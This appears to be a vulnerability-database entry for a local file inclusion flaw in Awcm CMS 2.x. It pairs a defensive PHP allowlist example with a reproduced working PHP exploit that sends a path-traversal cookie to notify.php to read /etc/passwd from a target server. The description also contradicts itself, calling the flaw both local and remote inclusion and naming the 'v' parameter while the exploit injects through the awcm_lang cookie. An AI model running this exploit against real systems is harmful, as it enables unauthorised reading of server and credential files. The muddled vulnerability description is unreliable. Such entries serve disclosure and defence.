Vendor: Awcm Cms
By: SwEET-DeViL
CVSS: 7.5 (HIGH)
Local File Inclusion
CWE: 98
Product Name: Awcm Cms
Affected Version From: 2.x
Affected Version To: 2.x
Patch Exists: NO
Related CWE: N/A
CPE: awcm-cms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2020

Awcm Cms Local File Inclusion Vulnerability

Awcm Cms is vulnerable to a Local File Inclusion vulnerability. An attacker can exploit it to include a remote file on the web server. The vulnerability exists due to insufficient sanitization of user-supplied input to the 'v' parameter in the 'notify.php' script. An attacker can exploit it by sending a specially crafted HTTP request with malicious input to the vulnerable script. Successful exploitation can result in arbitrary remote file inclusion.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in the application. It is recommended to use whitelisting techniques to ensure that only expected characters are accepted in the input.
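
The whitelisting approach described above, sketched as an added example for a language selector such as the awcm_lang cookie that the proof of concept on this page sets. This is not AWCM's code: the function name, the default language, the directory layout and the sample values are assumptions made for illustration.

```php
<?php
// Added example, not AWCM code: allowlist handling for a language selector
// such as the awcm_lang cookie. Paths and names below are assumptions.
const DEFAULT_LANG = 'english'; // hypothetical default language

/** Return the language file that is safe to include for a requested value. */
function resolve_language_file(?string $requested, array $allowed, string $dir): string
{
    // 1. Character allowlist: rejects "/", "\", ".", NUL bytes and anything unexpected.
    if ($requested === null || !preg_match('/\A[a-z]{2,20}\z/', $requested)) {
        $requested = DEFAULT_LANG;
    }
    // 2. Exact match against the set of installed languages.
    if (!in_array($requested, $allowed, true)) {
        $requested = DEFAULT_LANG;
    }
    // 3. Defence in depth: the resolved path must stay inside the language directory.
    $base = realpath($dir);
    $path = realpath($dir . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('language file unavailable');
    }
    return $path;
}

// Constructed demo: a temporary language directory and sample cookie values.
// In an application the first argument would be $_COOKIE['awcm_lang'] ?? null.
$dir = sys_get_temp_dir() . '/lang_demo_' . getmypid();
@mkdir($dir);
$installed = ['english', 'arabic'];
foreach ($installed as $l) {
    file_put_contents("$dir/$l.php", "<?php // $l strings\n");
}
$samples = ['arabic', '../../../../../../../../etc/passwd', "english\0", 'klingon', null];
foreach ($samples as $cookie) {
    $file = resolve_language_file($cookie, $installed, $dir);
    printf("%-45s -> %s\n", json_encode($cookie, JSON_UNESCAPED_SLASHES), basename($file));
}
```

Only a value that passes both the character check and the exact-match list selects a file; everything else falls back to the default instead of reaching the filesystem.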

Exploit-DB raw data:

# Software Link: http://www.awcm-cms.com/
# Version: 2.x
# Tested on: Linux

Exploit :

<?php

print("
------------------------------------------------------------
| Awcm Cms Local File Inclusion Vulnerability
| By SwEET-DeViL
| x0.root(at)gmail.com
| example
|
| Exploit.php ".$argv[0]." example.com /path/ ../../../../../../../../etc/passwd
------------------------------------------------------------
");
$host =$argv[1];//;
$Path = "http://".$host.$argv[2];
       $CURL_in ="GET ".$Path."/notify.php?v=a HTTP/1.0\r\n";
       $CURL_in.="User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)\r\n";
       $CURL_in.="Pragma: no-cache\r\n";
       $CURL_in.="Cookie: awcm_lang=".$argv[3]."".";\r\n";
       $CURL_in.="Connection: Close\r\n\r\n";

       if ( empty($argv[3]) ){
               echo "\n[-] Error : Exploit failed\n";
               die;
       }

       $FoN = @fsockopen($host, 80);
       if(!$FoN){
               echo "\n[-] Error : Can't connect to ".$host." !!\n";
               die;
       }

       fputs($FoN, $CURL_in);
       while (!feof($FoN)) $data .= fread($FoN, 1024);
       fclose($FoN);

       $error_1 = strstr( $data, "HTTP/1.1 404 Not Found" );
       if ( !empty($error_1) ){
               echo "\n[-] Error : 404 Not Found. \n";
               die;
       }

       $error_2 = strstr( $data, "HTTP/1.1 406 Not Acceptable" );
       if ( !empty($error_2) ){
               echo "\n[-] Error : 406 Not Acceptable. \n";
               die;
       }



$EXc = explode("</head>",$data);
$EXx = explode("<head>",$EXc[1]);
$CODE = strip_tags($EXx[0]);
$CODE2 = preg_replace("/\r|\t/",'',$CODE);
$CODE2 = trim($CODE2);

if (empty($CODE2)){
print ('

[-] Error : Sorry! File not Found

');
}else{
print ('
[+]
------------------------------------------------------------
').$CODE2;



print ('

------------------------------------------------------------
');

}

?>